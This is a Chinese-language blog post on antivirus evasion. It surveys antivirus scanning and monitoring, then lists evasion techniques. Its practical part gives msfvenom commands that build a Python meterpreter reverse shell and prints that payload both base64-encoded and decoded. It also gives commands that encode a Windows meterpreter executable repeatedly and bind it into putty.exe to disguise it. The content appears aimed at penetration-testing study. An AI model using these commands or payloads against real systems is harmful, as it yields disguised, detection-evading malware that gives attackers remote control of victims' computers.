<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>免杀1 | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="免杀介绍杀软相关:  扫描技术:  123456789扫描技术：n 1、扫描压缩包技术：即是对压缩包案和封装⽂件作分析检查的技术。n 2、程序窜改防护：即是避免恶意程序借由删除杀毒侦测程序⽽⼤肆破坏电脑。n 3、修复技术：即是对恶意程序所损坏的⽂件进⾏还原n 4、急救盘杀毒：利⽤空⽩U盘制作急救启动盘，来检测电脑病毒。n 5、智能扫描：扫描最常⽤的磁盘，系统关键位置，耗时较短。n 6、全盘扫描：扫">
<meta property="og:type" content="article">
<meta property="og:title" content="免杀1">
<meta property="og:url" content="http://yoursite.com/2021/08/09/%E5%85%8D%E6%9D%801/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="免杀介绍杀软相关:  扫描技术:  123456789扫描技术：n 1、扫描压缩包技术：即是对压缩包案和封装⽂件作分析检查的技术。n 2、程序窜改防护：即是避免恶意程序借由删除杀毒侦测程序⽽⼤肆破坏电脑。n 3、修复技术：即是对恶意程序所损坏的⽂件进⾏还原n 4、急救盘杀毒：利⽤空⽩U盘制作急救启动盘，来检测电脑病毒。n 5、智能扫描：扫描最常⽤的磁盘，系统关键位置，耗时较短。n 6、全盘扫描：扫">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2021-08-09T13:00:36.000Z">
<meta property="article:modified_time" content="2021-08-09T13:01:22.262Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.0.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-免杀1" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2021/08/09/%E5%85%8D%E6%9D%801/" class="article-date">
  <time datetime="2021-08-09T13:00:36.000Z" itemprop="datePublished">2021-08-09</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      免杀1
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="免杀介绍"><a href="#免杀介绍" class="headerlink" title="免杀介绍"></a>免杀介绍</h2><p>杀软相关:</p>
<ol>
<li>扫描技术:</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">扫描技术：</span><br><span class="line">n 1、扫描压缩包技术：即是对压缩包案和封装⽂件作分析检查的技术。</span><br><span class="line">n 2、程序窜改防护：即是避免恶意程序借由删除杀毒侦测程序⽽⼤肆破坏电脑。</span><br><span class="line">n 3、修复技术：即是对恶意程序所损坏的⽂件进⾏还原</span><br><span class="line">n 4、急救盘杀毒：利⽤空⽩U盘制作急救启动盘，来检测电脑病毒。</span><br><span class="line">n 5、智能扫描：扫描最常⽤的磁盘，系统关键位置，耗时较短。</span><br><span class="line">n 6、全盘扫描：扫描电脑全部磁盘，耗时较⻓。</span><br><span class="line">n 7、勒索软件防护：保护电脑中的⽂件不被⿊客恶意加密。</span><br><span class="line">n 8、开机扫描：当电脑开机时⾃动进⾏扫描，可以扫描压缩⽂档和可能不需要的程序</span><br></pre></td></tr></table></figure>

<ol start="2">
<li>监控技术</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">监控技术：</span><br><span class="line">n 1、内存监控：当发现内存中存在病毒的时候，就会主动报警；监控所有进程；监控</span><br><span class="line">n 读取到内存中的⽂件；监控读取到内存的⽹络数据。</span><br><span class="line">n 2、⽂件监控：当发现写到磁盘上的⽂件中存在病毒，或者是被病毒感染，就会主动</span><br><span class="line">n 报警。</span><br><span class="line">n 3、邮件监控：当发现电⼦邮件的附件存在病毒时进⾏拦截。</span><br><span class="line">n 4、⽹⻚防护：阻⽌⽹络攻击和不安全下载。</span><br><span class="line">n 5、⾏为防护：提醒⽤户可疑的应⽤程序⾏为。</span><br></pre></td></tr></table></figure>

<p>特征码</p>
<p>文件特征码</p>
<p>内存特征码</p>
<p>文件校验和</p>
<p>checksum   生成校验和：md5sum 文件名</p>
<p>沙箱</p>
<p>….</p>
<h2 id="免杀技术"><a href="#免杀技术" class="headerlink" title="免杀技术"></a>免杀技术</h2><p>修改特征码: 逆向</p>
<p>花指令免杀: 汇编</p>
<p>加壳免杀</p>
<p>内存免杀</p>
<p>二次编译</p>
<p>分离免杀: shellcode (机器码)</p>
<p>资源修改:</p>
<p>​    白名单: 把恶意程序修改成常见的程序的名称</p>
<p>​    数字签名: 数字签名添加器</p>
<p>​    资源替换: </p>
<p>​        版本信息, 发行者信息, 图标信息等…<code>Resource Hacker</code></p>
<h4 id="metasploit免杀"><a href="#metasploit免杀" class="headerlink" title="metasploit免杀"></a>metasploit免杀</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">-shellest 最小化生成payload</span><br><span class="line">-k, –keep 保护模板程序的动作，注入的payload作为一个新的进程运行</span><br><span class="line">-b, –bad-chars &lt; list&gt; 设定规避字符集，指定需要过滤的坏字符例如：不使用 &#39;\x0f&#39;、&#39;\x00&#39;; </span><br><span class="line">-s, –space &lt; length&gt; 设定有效攻击荷载的最大长度，就是文件大小</span><br><span class="line">-n, –nopsled &lt; length&gt; 为payload预先指定一个NOP滑动长度</span><br></pre></td></tr></table></figure>

<p>高级模块:</p>
<p>​    show advanced    –&gt; 查看高级模块</p>
<p>​    PrependMigrate               true    –&gt; 是否开启进程迁移   </p>
<p>​    PrependMigrateProc                        –&gt; 指定迁移的进程 </p>
<p>​    ExitOnSession            false                –&gt; 防止会话假死   </p>
<p>​    EnableStageEncoding          true    –&gt; 允许编码</p>
<p>​    StageEncoder                                    –&gt; 木马连接时,对stage进行编码</p>
<p>​    EnableUnicodeEncoding            –&gt; 指定unicode编码</p>
<p>​    </p>
<p>​    raw: 原生代码,</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">生成py文件的木马</span><br><span class="line">msfvenom -a python  -p python/meterpreter/reverse_tcp lhost=<span class="number">192.168</span><span class="number">.1</span><span class="number">.135</span> lport=<span class="number">4444</span> -f raw &gt; <span class="number">1.</span>py</span><br><span class="line"></span><br><span class="line">base64解密:</span><br><span class="line">密文:</span><br><span class="line">aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMS4xMzUnLDQ0NDQpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKHpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKGQpKSx7J3MnOnN9KQo=</span><br><span class="line">解密:</span><br><span class="line">echo 密文 | base64 -d</span><br><span class="line"><span class="keyword">import</span> socket,zlib,base64,struct,time</span><br><span class="line"><span class="keyword">for</span> x <span class="keyword">in</span> range(<span class="number">10</span>):</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        s=socket.socket(<span class="number">2</span>,socket.SOCK_STREAM)</span><br><span class="line">        s.connect((<span class="string">&#x27;192.168.1.135&#x27;</span>,<span class="number">4444</span>))</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        time.sleep(<span class="number">5</span>)</span><br><span class="line">l=struct.unpack(<span class="string">&#x27;&gt;I&#x27;</span>,s.recv(<span class="number">4</span>))[<span class="number">0</span>]</span><br><span class="line">d=s.recv(l)</span><br><span class="line"><span class="keyword">while</span> len(d)&lt;l:</span><br><span class="line">    d+=s.recv(l-len(d))</span><br><span class="line">exec(zlib.decompress(base64.b64decode(d)),&#123;<span class="string">&#x27;s&#x27;</span>:s&#125;)</span><br></pre></td></tr></table></figure>

<p>编码模块: -e(指定编码)  -i(指定编码次数)</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">常用:</span><br><span class="line">x86&#x2F;shikata_ga_nai</span><br><span class="line">x86&#x2F;xor_dynamic</span><br><span class="line">x64&#x2F;xor_dynamic</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">自编码免杀:</span><br><span class="line">msfvenom -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;IP LPORT&#x3D;PORT -e x86&#x2F;shikata_ga_nai -i 15 -f exe -o shell.exe</span><br><span class="line"></span><br><span class="line">自捆绑免杀:</span><br><span class="line">msfvenom -x putty.exe -p windows&#x2F;meterpreter&#x2F;reverse_tcp LHOST&#x3D;192.168.1.129 LPORT&#x3D;4444 -f exe -o payload.exe</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2021/08/09/%E5%85%8D%E6%9D%801/" data-id="cktx2e6a3000mwovjbkx65zhc" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2021/08/12/%E5%85%8D%E6%9D%802/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          免杀2
        
      </div>
    </a>
  
  
    <a href="/2021/08/06/armitage%E5%92%8C%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">armitage和漏洞复现</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/08/">August 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">July 2021</a></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2020/08/">August 2020</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2021/09/23/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/">sql注入基础</a>
          </li>
        
          <li>
            <a href="/2021/09/19/%E4%BF%A1%E6%81%AF%E8%B5%84%E4%BA%A7%E6%94%B6%E9%9B%86/">信息资产收集</a>
          </li>
        
          <li>
            <a href="/2021/09/15/%E5%8A%A0%E5%AF%86%E7%BC%96%E7%A0%81%E7%AE%97%E6%B3%95%E5%92%8CCDN%E7%BB%95%E8%BF%87/">加密编码算法和CDN绕过</a>
          </li>
        
          <li>
            <a href="/2021/09/12/Web%E7%BD%91%E7%AB%99%E6%A1%86%E6%9E%B6%E5%AE%89%E5%85%A8/">Web网站框架安全</a>
          </li>
        
          <li>
            <a href="/2021/09/10/%E7%BD%91%E7%AB%99%E6%95%B0%E6%8D%AE%E5%8C%85%E7%BB%93%E6%9E%84%E5%88%86%E6%9E%90/">网站数据包结构分析</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2021 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>